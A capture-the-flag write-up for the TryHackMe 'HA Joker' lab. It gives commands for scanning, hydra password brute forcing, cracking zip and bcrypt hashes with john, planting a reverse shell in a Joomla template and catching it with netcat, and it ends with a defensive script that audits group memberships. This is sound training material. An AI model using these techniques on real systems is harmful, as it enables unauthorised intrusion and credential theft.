TryHackMe HA Joker CTF Writeup

Let’s start with an nmap scan.

Command: nmap -vv -sCV 10.10.185.86

Let’s run a directory scan against the HTTP service on port 80.

Command: gobuster dir -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

Let’s take a look at the “secret.txt” file we found.

It looks like a conversation between Joker and Batman. Either of these names could be a username.

Let’s take a look at the other HTTP service we found, on port 8080.

I think we can brute force here with the username we just found.

Command: hydra -l joker -P /home/hakanbey/Desktop/rockyou.txt -f 10.10.185.86 -s 8080 http-get

Yes, we found the password. We can now log in.

Again we need a directory scan, but since this port answers with 401 and requires HTTP Basic authentication, we have to pass the credentials to gobuster.

Command: gobuster dir -U joker -P ha**** -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We find a file named “backup” and download it. It looks like a password-protected zip file.

We can crack the password of the zip file using the “zip2john” and “john” tools.

Command: /usr/sbin/zip2john backup > hash

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash

Yes, we now have the password and can look inside the zip file.

Command: unzip backup

Two directories named “db” and “site” came out of the zip. Inside “db” we find the file “joomladb.sql”. Rather than read the whole dump, let’s grep it for the users table.

Command: cat joomladb.sql | grep users

Yes, we got the password of the user named admin from the database dump, but it is hashed with bcrypt. We save the hash to a file named hash2 and crack it with john.

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash2

Now we have the password for the user named admin. Let’s log in from the Joomla login page.

Yes, we are in. Now let’s get a shell. From the top menu we go to Extensions > Templates > Templates, select the “Beez3” template and open “error.php” from the side panel for editing. We paste our reverse shell code here.

Now we start a netcat listener and trigger the reverse shell by requesting the edited page.

Command: nc -lvp 4444

Command: http://10.10.185.86:8080/templates/beez3/error.php

We spawn a pty with Python and set TERM to xterm.

Command: python3 -c 'import pty;pty.spawn("/bin/bash")'

Command: export TERM=xterm

We can now escalate privileges. We saw that the www-data user is a member of the lxd group.
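As an added defensive check (not part of the original writeup), the following Python script audits an /etc/group dump for exactly this misconfiguration: service accounts such as www-data placed in groups like lxd or docker, whose membership is equivalent to root. The sample group file, the list of root-equivalent groups and the service-account names are constructed for the example.

```python
# Added example: audit /etc/group-style data for accounts placed in groups that
# grant root-equivalent access. Not part of the writeup; group list is an assumption.
from typing import Dict, List

# Groups whose membership is effectively root on a typical Linux host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel"}

# Constructed sample in /etc/group format; the lxd line mirrors the
# misconfiguration this box is built around (www-data in lxd).
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,hakanbey
sudo:x:27:hakanbey
www-data:x:33:
lxd:x:108:hakanbey,www-data
docker:x:999:
"""


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> member list, skipping blank, comment and malformed lines."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed entry; ignore rather than guess
        name, _pw, _gid, members = fields
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_risky_memberships(text: str, service_accounts=("www-data", "apache", "nginx")) -> List[str]:
    """Return 'user:group' findings for every member of a root-equivalent group.

    Service accounts are listed first: a web shell running as one of them
    becomes root through that group, which is the path this box takes.
    """
    groups = parse_group_file(text)
    findings = [f"{user}:{gname}"
                for gname in sorted(ROOT_EQUIVALENT_GROUPS & groups.keys())
                for user in groups[gname]]
    findings.sort(key=lambda f: (f.split(":")[0] not in service_accounts, f))
    return findings


if __name__ == "__main__":
    for finding in find_risky_memberships(SAMPLE_GROUP_FILE):
        print("root-equivalent group membership:", finding)
```

On a real host, feed it the actual file with `find_risky_memberships(open("/etc/group").read())`; any service account in the output is a finding to fix.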

First, we carry out the following steps on our own machine.

In this part, we carry out the steps on the target machine.

We are root now.

Command: cd /mnt/root/root/ && cat final.txt

Thank you for reading and solving.
